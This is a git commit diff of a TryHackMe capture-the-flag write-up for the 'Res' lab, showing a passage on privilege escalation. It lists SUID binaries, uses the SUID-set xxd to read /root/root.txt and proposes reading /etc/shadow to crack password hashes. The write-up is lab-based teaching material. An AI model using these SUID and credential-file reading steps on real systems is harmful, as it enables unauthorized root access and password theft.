Update Res.md

2024-11-24 21:03:07 +00:00 · 2020-11-03 15:33:57 -05:00 · 2020-11-03 15:33:57 -05:00 · dffbeef8dd
commit dffbeef8dd
parent 59546c7292
1 changed files with 5 additions and 22 deletions
--- a/TryHackMe/Res.md
+++ b/TryHackMe/Res.md
@ -78,26 +78,6 @@ In `/home/vianka` We can find the user flag
 ### Root Flag
 Now for the root flag by looing for `SUID` we see that `xxd` has an suid bit set so it can run as root by anyone
 www-data@ubuntu:/$ find / -perm /4000 2>/dev/null 
 /bin/ping
 /bin/fusermount
 /bin/mount
 /bin/su
 /bin/ping6
 /bin/umount
 /usr/bin/chfn
 /usr/bin/xxd
 /usr/bin/newgrp
 /usr/bin/sudo
 /usr/bin/passwd
 /usr/bin/gpasswd
 /usr/bin/chsh
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
 www-data@ubuntu:/$ xxd /root/root.txt | xxd -r
 thm{xxd_pr1v_escalat1on}
 ```
 www-data@ubuntu:/$ find / -perm /4000 2>/dev/null 
@ -120,8 +100,11 @@ www-data@ubuntu:/$ find / -perm /4000 2>/dev/null
 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
 www-data@ubuntu:/$ xxd /root/root.txt | xxd -r
 thm{xxd_pr1v_escalat1on}
 ```
 ### Privilege Escalation 
 We got the root flag without even being root but I love to find a way to get root so lets do that.We know that we can read almost anyting with `xxd` so lets try to read `/etc/shadow` and crack the user's hash 
@ -172,4 +155,4 @@ root@ubuntu:/#
 ```
-We are root !
+We are root !